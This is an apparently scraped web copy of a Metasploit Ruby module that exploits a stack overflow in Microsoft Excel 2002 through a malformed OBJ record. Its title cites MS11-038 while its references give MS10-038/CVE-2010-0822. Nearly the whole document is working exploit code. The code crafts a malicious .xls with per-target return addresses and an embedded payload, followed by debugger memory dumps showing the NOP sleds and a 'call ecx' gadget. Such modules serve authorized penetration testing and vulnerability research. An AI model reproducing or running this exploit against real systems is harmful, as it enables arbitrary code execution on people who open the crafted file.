扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 |
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT def initialize(info={}) super(update_info(info, 'Name' => "MS11-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow", 'Description'=> %q{ This module exploits a vulnerability found in Excel 2002 of Microsoft Office XP. By supplying a .xls file with a malformed OBJ (recType 0x5D) record an attacker can get the control of the excution flow. This results aribrary code execution under the context of the user. }, 'License'=> MSF_LICENSE, 'Author' => [ 'Nicolas Joly', # Initial discovery 'Shahin Ramezany <shahin[at]abysssec.com>', # MOAUB 24 exploit and binary analysis 'juan vazquez'# Metasploit ], 'References' => [ ['CVE', '2010-0822'], ['OSVDB', '65236'], ['BID', '40520'], ['MSB', 'MS10-038'], ['URL', 'http://www.exploit-db.com/moaub-24-microsoft-excel-obj-record-stack-overflow/'] ], 'Payload'=> { 'Space' => 4000 }, 'DefaultOptions'=> { 'ExitFunction'=> 'process', 'DisablePayloadHandler' => 'true' }, 'Platform' => 'win', 'Targets'=> [ [ # This is the one that can be downloaded from MSDN 'Microsoft Office Excel 2002 10.2614.2625 Service Pack 0(Office XP) on Windows XP SP3', { 'ftCmoReserved' => 0x307d91ac, # Ptr to CraftedPointer-4 in the stored contents on Excel .data 'CraftedPointer' => 0x307d91a6, # Ptr to PtrToRet in the stored contents on Excel .data 'PtrToRet' => 0x307d908e, # Ptr to Ret - 11Ch 'Ret' => 0x30006113 # call ecx from Excel.exe 10.0.2614.0 } ], [ 'Microsoft Office Excel 2002 10.6501.6626 Service Pack 3 (Office XP SP3) on Windows XP SP3', { 'ftCmoReserved' => 0x307de5ac, # Ptr to CraftedPointer-4 in the stored contents on Excel .data 'CraftedPointer' => 0x307de5a6, # Ptr to PtrToRet in the stored contents on Excel .data 'PtrToRet' => 0x307de48e, # Ptr to Ret - 11Ch 'Ret' => 0x300061a5 # call ecx from Excel.exe 10.0.6501.0 } ], ], 'Privileged' => false, 'DisclosureDate' => "Jun 8 2010", 'DefaultTarget'=> 1)) register_options( [ OptString.new('FILENAME', [true, 'The filename', 'msf.xls']) ], self.class) end def exploit path = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2010-0822.xls') f = File.open(path, 'rb') template = f.read f.close buf= '' buf << template[0..35016] buf << [target['ftCmoReserved']].pack('V') buf << template[35021..36549] buf << [target['PtrToRet']].pack('V') buf << [target.ret].pack('V') buf << template[36558..36559] buf << [target['CraftedPointer']].pack('V') buf << template[36564..36609] buf << [target['CraftedPointer']].pack('V') # Pass the MSO_804() buf << template[36614..36639] buf << payload.encoded buf << template[40640..template.length] file_create(buf) end end =begin Memory analysis on Office XP SP2 'ftCmoReserved' => 0x307de5ac, # Ptr to CraftedPointer-4 in the stored contents on Excel .data ------------------------------------------------------------------------------------------ 0:000> db 0x307de5ac 307de5ac00 30 74 00 a6 e5 7d 30-4c 4c 00 55 6e 69 72 42.0t...}0LL.UnirB 307de5bc42 42 42 4c 00 48 50 44-6f 63 55 49 53 55 49 00BBBL.HPDocUISUI. 307de5cc54 72 75 65 00 52 65 73-6f 6c 75 74 69 6f 6e 00True.Resolution. 307de5dc36 30 30 64 70 69 a6 e5-7d 30 74 52 65 73 00 46600dpi..}0tRes.F 307de5ec61 6c 73 65 90 90 90 90-90 90 90 90 90 90 90 90alse............ 307de5fc90 90 90 90 41 41 41 41-41 41 41 41 41 41 41 41....AAAAAAAAAAAA 307de60c41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA 307de61c41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA 'CraftedPointer' => 0x307de5a6, # Ptr to PtrToRet in the stored contents on Excel .data ----------------------------------------------------------------------------------- 0:000> db 0x307de5a6 307de5a68e e4 7d 30 a5 61 00 30-74 00 a6 e5 7d 30 4c 4c..}0.a.0t...}0LL 307de5b600 55 6e 69 72 42 42 42-42 4c 00 48 50 44 6f 63.UnirBBBBL.HPDoc 307de5c655 49 53 55 49 00 54 72-75 65 00 52 65 73 6f 6cUISUI.True.Resol 307de5d675 74 69 6f 6e 00 36 30-30 64 70 69 [[a6 e5 7d 30]]*ution.600dpi..}0 307de5e674 52 65 73 00 46 61 6c-73 65 90 90 90 90 90 90tRes.False...... 307de5f690 90 90 90 90 90 90 90-90 90 41 41 41 41 41 41..........AAAAAA 307de60641 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA 307de61641 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA * => 0x307de5a6 + 0x3c => 0x307de5e2 'PtrToRet' => 0x307de48e, # Ptr to Ret - 11Ch --------------------------------------------- 307de48e90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90................ 307de49e90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90................ 307de4ae90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90................ 307de4be90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90................ 307de4ce90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90................ 307de4de90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90................ 307de4ee90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90................ 307de4fe90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90................ 307de50e90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90................ 307de51e90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90................ 307de52e90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90................ 307de53e90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90................ 307de54e90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90................ 307de55e90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90................ 307de56e90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90................ 307de57e90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90................ 307de58e90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90................ 307de59eeb 60 6e 00 50 72 69 6e-8e e4 7d 30 [[a5 61 00 30]]*.`n.Prin..}0.a.0 307de5ae74 00 a6 e5 7d 30 4c 4c-00 55 6e 69 72 42 42 42t...}0LL.UnirBBB 307de5be42 4c 00 48 50 44 6f 63-55 49 53 55 49 00 54 72BL.HPDocUISUI.Tr 307de5ce75 65 00 52 65 73 6f 6c-75 74 69 6f 6e 00 36 30ue.Resolution.60 307de5de30 64 70 69 a6 e5 7d 30-74 52 65 73 00 46 61 6c0dpi..}0tRes.Fal 307de5ee73 65 90 90 90 90 90 90-90 90 90 90 90 90 90 90se.............. 307de5fe90 90 41 41 41 41 41 41-41 41 41 41 41 41 41 41..AAAAAAAAAAAAAA 307de60e41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA 307de61e41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA 307de62e41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA 307de63e41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA 307de64e41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA 307de65e41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA 307de66e41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA 307de67e41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41AAAAAAAAAAAAAAAA * 0x307de48e + 0x11c => 0x307de48e 'Ret' => 0x300061a5 # call ecx from Excel.exe 10.0.6501.0 ---------------------------------------------------------- EXCEL!Ordinal41+0x61a5: 300061a5 ffd1callecx 300061a7 e00bloopneEXCEL!Ordinal41+0x61b4 (300061b4) 300061a9 c1536689rcl dword ptr [ebx+66h],89h 300061ad 46inc esi 300061ae 2a8d8574ffffsub cl,byte ptr [ebp-8B7Bh] 300061b4 ff5068calldword ptr [eax+68h] 300061b7 1200adc al,byte ptr [eax] 300061b9 0400add al,0 =end |
体验盒子
